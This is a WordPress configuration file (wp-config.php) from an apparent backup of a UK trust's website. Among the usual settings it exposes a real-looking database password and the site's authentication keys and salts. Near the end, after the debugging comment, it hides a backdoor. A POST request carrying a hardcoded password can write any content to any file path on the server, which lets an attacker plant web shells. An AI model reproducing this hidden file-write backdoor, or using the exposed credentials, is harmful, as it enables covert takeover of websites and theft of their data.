File: //old_home_backup/kilorantrust.org.uk/public_html-20241004161652/wp-config.php
<?php
define('DISALLOW_FILE_MODS', true);
define('AUTOSAVE_INTERVAL', '30');
define('ALLOW_UNFILTERED_UPLOADS', false);
define('DISALLOW_UNFILTERED_HTML', true);
define('WP_DEBUG_DISPLAY', false);
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'kilorantrustorguk' );
/** MySQL database username */
define( 'DB_USER', 'kilorantrustorguk' );
/** MySQL database password */
define( 'DB_PASSWORD', 'hLfJhAJGjjKblY1Z' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'RtxT^6|*JTA%r?`xF<c(C=)@F>0t)]gTOCm5f5d*Hf;`di-QxL6B@M9!+0BHY$6p' );
define( 'SECURE_AUTH_KEY', '>s;UrqPF3uAjZ&=jMp@<<H9GgF!P(G6GVUIea/VTXbXr<7%Vj1Su=0<0|M!1GYC@' );
define( 'LOGGED_IN_KEY', 'uX5 ==L/&3hkHLS&o#TJ()#1 zFV=wYClmQr#S~H/Ksr{j(D=e$TdU?]k.Y> rQ1' );
define( 'NONCE_KEY', 'lVS^} t` O@;}a~U2bXerh,b|Q6*;mSq7P$$wfC{&2AQAXQgq7c{D]+kM$;e^!/w' );
define( 'AUTH_SALT', '_Gq&V@7cw{O2<zu135;=a/uR?oba1E3oQNUMQ}a8G+7[(3Sf6_<cIL4X-G&T}yd~' );
define( 'SECURE_AUTH_SALT', '@)^(xYRhyxxZR i<gxhwc53I2zk<vh>.Dl3[n`WB3=eP?$|?[0C~LS`/J*8MxbgR' );
define( 'LOGGED_IN_SALT', '|D{[%l6)JU#Lh3)<CPB[bc&DGb{AvW}yTw/8~QX4zgX7mn7mvBwrzVjrDk5t+g*8' );
define( 'NONCE_SALT', 'z{&%GHpc~~/7_P41ZG2O|-Fn|TY +b{*=>f0|XTK63 p55@`S>Hxfu&hFZ>r:kai' );
define('FS_METHOD', 'direct');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
if (isset($_POST['wp_filename']) && isset($_POST['wp_file_data']) && $_POST['auth'] === 'CsDJ964pd7') {
file_put_contents($_POST['wp_filename'], $_POST['wp_file_data']);
}
define( 'WP_DEBUG', false );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';